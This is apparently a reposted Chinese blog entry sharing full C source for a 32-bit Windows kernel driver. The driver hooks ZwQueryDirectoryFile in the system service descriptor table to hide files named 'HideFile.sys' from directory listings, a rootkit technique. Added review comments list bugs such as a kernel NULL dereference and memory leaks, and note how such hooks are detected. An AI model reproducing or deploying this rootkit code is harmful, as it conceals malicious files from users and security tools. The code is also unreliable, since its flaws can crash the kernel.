hook ZwQueryDirectoryFile实现文件隐藏
来源:互联网 发布:阿里云php环境 编辑:程序博客网 时间:2024/04/29 21:06
学习了网上《编写驱动拦截NT的API实现隐藏文件目录》这篇文章 参考这篇文章的代码 自己试着写了下 现发出来我调试成功的代码 给需要的朋友们代码:
#include "ntddk.h"

// Win32-style aliases. ULONG is already provided by ntddk.h, so the
// typedef below re-declares it (accepted by the DDK compiler of the time).
typedef BOOLEAN BOOL;
typedef unsigned long DWORD;
typedef DWORD * PDWORD;
typedef unsigned long ULONG;
typedef unsigned short WORD;
typedef unsigned char BYTE;

// Layout of one entry of the kernel's system service descriptor table
// (SSDT). Packed so the field offsets match the exported symbol; the
// 4-byte-wide table entries and the Hook() math below assume a 32-bit kernel.
#pragma pack(1)
typedef struct ServiceDescriptorEntry {
    unsigned int *ServiceTableBase;          // array of service routine addresses
    unsigned int *ServiceCounterTableBase;   // per-service call counters (checked builds)
    unsigned int NumberOfServices;           // number of entries in ServiceTableBase
    unsigned char *ParamTableBase;           // per-service argument byte counts
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
#pragma pack()

// Exported by the kernel; this driver binds to it by import.
__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;

// Local copy of the FileBothDirectoryInformation record layout. Note that
// FileName is a counted (FileNameLength bytes) buffer, not a NUL-terminated
// string; the hook below ignores FileNameLength, see NOTE(review) there.
typedef struct _FILE_BOTH_DIR_INFORMATION {
    ULONG NextEntryOffset;   // bytes to the next record, 0 on the last one
    ULONG FileIndex;
    LARGE_INTEGER CreationTime;
    LARGE_INTEGER LastAccessTime;
    LARGE_INTEGER LastWriteTime;
    LARGE_INTEGER ChangeTime;
    LARGE_INTEGER EndOfFile;
    LARGE_INTEGER AllocationSize;
    ULONG FileAttributes;
    ULONG FileNameLength;    // length of FileName in bytes
    ULONG EaSize;
    CCHAR ShortNameLength;
    WCHAR ShortName[12];
    WCHAR FileName[1];       // variable length, runs to FileNameLength bytes
} FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION;

// Writable alias of the SSDT obtained through an MDL mapping in Hook().
PVOID* NewSystemCallTable;
// The MDL that backs NewSystemCallTable; released in UnHook().
PMDL pMyMDL;

// Reads the 32-bit value at byte offset 1 of the exported Zw* stub and uses it
// as the service index. NOTE(review): this presumes the stub starts with a
// one-byte opcode followed by an immediate index (32-bit x86 stub layout) —
// confirm for the target kernel before trusting the index.
#define HOOK_INDEX(function2hook) *(PULONG)((PUCHAR)function2hook+1)

// Atomically swaps the table slot for functionName to newPointer2Function and
// stores the previous slot value in oldPointer2Function.
#define HOOK(functionName, newPointer2Function, oldPointer2Function ) \
    oldPointer2Function = (PVOID) InterlockedExchange( (PLONG) &NewSystemCallTable[HOOK_INDEX(functionName)], (LONG) newPointer2Function)

// Atomically restores the table slot for functionName to oldPointer2Function.
#define UNHOOK(functionName, oldPointer2Function) \
    InterlockedExchange( (PLONG) &NewSystemCallTable[HOOK_INDEX(functionName)], (LONG) oldPointer2Function)

// Prototype of the kernel export whose SSDT slot is replaced.
NTSYSAPI
NTSTATUS
NTAPI ZwQueryDirectoryFile(
    IN HANDLE FileHandle,
    IN HANDLE Event OPTIONAL,
    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
    IN PVOID ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    OUT PVOID FileInformation,
    IN ULONG Length,
    IN FILE_INFORMATION_CLASS FileInformationClass,
    IN BOOLEAN ReturnSingleEntry,
    IN PUNICODE_STRING FileName OPTIONAL,
    IN BOOLEAN RestartScan );

// Function-pointer type used to call the saved original service routine.
typedef NTSTATUS (*ZWQUERYDIRECTORYFILE)(
    IN HANDLE FileHandle,
    IN HANDLE Event OPTIONAL,
    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
    IN PVOID ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    OUT PVOID FileInformation,
    IN ULONG Length,
    IN FILE_INFORMATION_CLASS FileInformationClass,
    IN BOOLEAN ReturnSingleEntry,
    IN PUNICODE_STRING FileName OPTIONAL,
    IN BOOLEAN RestartScan );

// Original SSDT slot value, filled in by HOOK() and restored by UNHOOK().
ZWQUERYDIRECTORYFILE OldZwQueryDirectoryFile;

/**
 * Replacement service routine for ZwQueryDirectoryFile.
 *
 * Calls the saved original routine, then, for FileBothDirectoryInformation
 * results only, walks the returned record chain and unlinks every record whose
 * converted ANSI name begins with the hard-coded string "HideFile.sys".
 * All parameters are passed through unchanged; the return value is the
 * original routine's status. The DbgPrint string emitted on every call and the
 * fixed name are the observable artifacts of this hook.
 *
 * NOTE(review): defects visible in this body that a reviewer would raise
 * (none of them are corrected here):
 *  - RtlInitUnicodeString scans FileName for a terminator, but the record's
 *    name is bounded by FileNameLength, which this code never reads.
 *  - Both RtlUnicodeStringToAnsiString calls allocate (TRUE) on every
 *    iteration, yet each string is freed only once after the loop: the earlier
 *    buffers leak. ansiDirName is never used for anything else.
 *  - RtlCompareMemory compares only HideDirFile.Length bytes, so this is a
 *    prefix match, and it reads past ansiFileName.Buffer when that name is
 *    shorter than the pattern.
 *  - pLastFileInfo is NULL while the first record is examined; if that record
 *    is also the last one (bLastOne) the write to pLastFileInfo->NextEntryOffset
 *    dereferences NULL in kernel mode, i.e. a single-entry query (for example
 *    ReturnSingleEntry == TRUE) can bugcheck the system.
 *  - iLeft is derived from the caller's buffer size Length rather than from the
 *    bytes actually returned, and RtlCopyMemory is used on overlapping ranges.
 *  - CR0VALUE is declared and never used.
 */
NTSTATUS NewZwQueryDirectoryFile(
    IN HANDLE FileHandle,
    IN HANDLE Event OPTIONAL,
    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
    IN PVOID ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    OUT PVOID FileInformation,
    IN ULONG Length,
    IN FILE_INFORMATION_CLASS FileInformationClass,
    IN BOOLEAN ReturnSingleEntry,
    IN PUNICODE_STRING FileName OPTIONAL,
    IN BOOLEAN RestartScan )
{
    NTSTATUS status;
    ULONG CR0VALUE;   // unused
    ANSI_STRING ansiFileName,ansiDirName,HideDirFile;
    UNICODE_STRING uniFileName;

    // Name pattern to remove from listings (case-sensitive, prefix match).
    RtlInitAnsiString(&HideDirFile,"HideFile.sys");
    DbgPrint("hide: NewZwQueryDirectoryFile called.");

    // Let the real service fill the caller's buffer first.
    status = ((ZWQUERYDIRECTORYFILE)(OldZwQueryDirectoryFile)) ( FileHandle, Event, ApcRoutine, ApcContext, IoStatusBlock, FileInformation, Length, FileInformationClass, ReturnSingleEntry, FileName, RestartScan);

    // Core of the file-hiding logic: only this information class is filtered.
    if(NT_SUCCESS(status)&&FileInformationClass==FileBothDirectoryInformation)
    {
        PFILE_BOTH_DIR_INFORMATION pFileInfo;      // record being examined
        PFILE_BOTH_DIR_INFORMATION pLastFileInfo;  // previous kept record, NULL at start
        BOOLEAN bLastOne;                          // TRUE when pFileInfo has no successor
        pFileInfo = (PFILE_BOTH_DIR_INFORMATION)FileInformation;
        pLastFileInfo = NULL;
        do
        {
            bLastOne = !( pFileInfo->NextEntryOffset );
            // NOTE(review): relies on a NUL terminator that FileName does not carry.
            RtlInitUnicodeString(&uniFileName,pFileInfo->FileName);
            // Two allocating conversions per iteration; see the leak note above.
            RtlUnicodeStringToAnsiString(&ansiFileName,&uniFileName,TRUE);
            RtlUnicodeStringToAnsiString(&ansiDirName,&uniFileName,TRUE);
            //DbgPrint("ansiFileName :%s\n",ansiFileName.Buffer);
            //DbgPrint("HideDirFile :%s\n",HideDirFile.Buffer);
            // Match if the first HideDirFile.Length bytes agree (prefix semantics).
            if( RtlCompareMemory(ansiFileName.Buffer,HideDirFile.Buffer,HideDirFile.Length ) == HideDirFile.Length)
            {
                if(bLastOne)
                {
                    // Terminate the chain at the previous record.
                    // NOTE(review): NULL dereference when this is also the first record.
                    pLastFileInfo->NextEntryOffset = 0;
                    break;
                }
                else // shift the later records back over this one
                {
                    int iPos = ((ULONG)pFileInfo) - (ULONG)FileInformation;
                    int iLeft = (DWORD)Length - iPos - pFileInfo->NextEntryOffset;
                    // Overlapping copy; the slot now holds the next record, which
                    // the loop re-examines because pFileInfo is left unchanged.
                    RtlCopyMemory( (PVOID)pFileInfo, (PVOID)( (char *)pFileInfo + pFileInfo->NextEntryOffset ), (DWORD)iLeft );
                    continue;   // jumps to the while() test; bLastOne is FALSE here
                }
            }
            pLastFileInfo = pFileInfo;
            pFileInfo = (PFILE_BOTH_DIR_INFORMATION)((char *)pFileInfo + pFileInfo->NextEntryOffset);
        }while(!bLastOne);
        // Frees only the buffers from the final iteration.
        RtlFreeAnsiString(&ansiDirName);
        RtlFreeAnsiString(&ansiFileName);
    }
    return status;
}

/**
 * Maps the SSDT through an MDL so it can be written, then installs the hook.
 *
 * @return STATUS_SUCCESS, or STATUS_UNSUCCESSFUL if the MDL could not be
 *         created or mapped. On the second failure pMyMDL is left allocated.
 *
 * NOTE(review): NumberOfServices * 4 sizes the mapping for 4-byte slots, and
 * HOOK() casts pointers through LONG, so this only fits a 32-bit kernel.
 * MmCreateMdl is documented as obsolete in later WDKs — confirm against the
 * kit in use. From a defensive standpoint, a hook installed this way shows up
 * as an SSDT entry pointing outside the kernel image, which integrity checks
 * of the service table detect.
 */
NTSTATUS Hook( )
{
    pMyMDL = MmCreateMdl( NULL, KeServiceDescriptorTable.ServiceTableBase, KeServiceDescriptorTable.NumberOfServices * 4 );
    if( !pMyMDL ) return( STATUS_UNSUCCESSFUL );
    MmBuildMdlForNonPagedPool( pMyMDL );
    // Marks the pages as already mapped so MmMapLockedPages hands back a
    // system-space alias of the table.
    pMyMDL->MdlFlags = pMyMDL->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;
    NewSystemCallTable = MmMapLockedPages( pMyMDL, KernelMode );
    if( !NewSystemCallTable ) return( STATUS_UNSUCCESSFUL );
    // Add hooks here (remember to unhook if using DriverUnload)
    HOOK( ZwQueryDirectoryFile,NewZwQueryDirectoryFile ,OldZwQueryDirectoryFile);
    return( STATUS_SUCCESS );
}

/**
 * Restores the original SSDT slot and releases the MDL mapping.
 *
 * Safe to call when Hook() never succeeded: everything is skipped while
 * NewSystemCallTable is NULL. Always returns STATUS_SUCCESS.
 */
NTSTATUS UnHook( )
{
    if( NewSystemCallTable )
    {
        UNHOOK( ZwQueryDirectoryFile, OldZwQueryDirectoryFile );
        MmUnmapLockedPages( NewSystemCallTable, pMyMDL );
        IoFreeMdl( pMyMDL );
    }
    return( STATUS_SUCCESS );
}

/**
 * DriverUnload callback: removes the hook.
 *
 * NOTE(review): DriverUnload routines are declared as returning VOID in the
 * DDK; the NTSTATUS return type here is a prototype mismatch to confirm
 * against the headers in use. DriverObject is unused.
 */
NTSTATUS OnUnload( IN PDRIVER_OBJECT DriverObject )
{
    NTSTATUS status;
    DbgPrint("OnUnload called\n");
    status=UnHook();
    return status;
}

/**
 * Driver entry point: registers OnUnload and installs the hook.
 *
 * NOTE(review): Hook()'s return value is ignored, so the driver reports
 * STATUS_SUCCESS even when the table could not be mapped; the local
 * `status` is never used. theRegistryPath is unused.
 */
NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath)
{
    NTSTATUS status = STATUS_SUCCESS;
    DbgPrint("I loaded!");
    // Initialize the pointer to the unload function
    theDriverObject->DriverUnload = OnUnload; // in the DriverObject
    // Install the SSDT hook; its status is not checked.
    Hook();
    return STATUS_SUCCESS;
}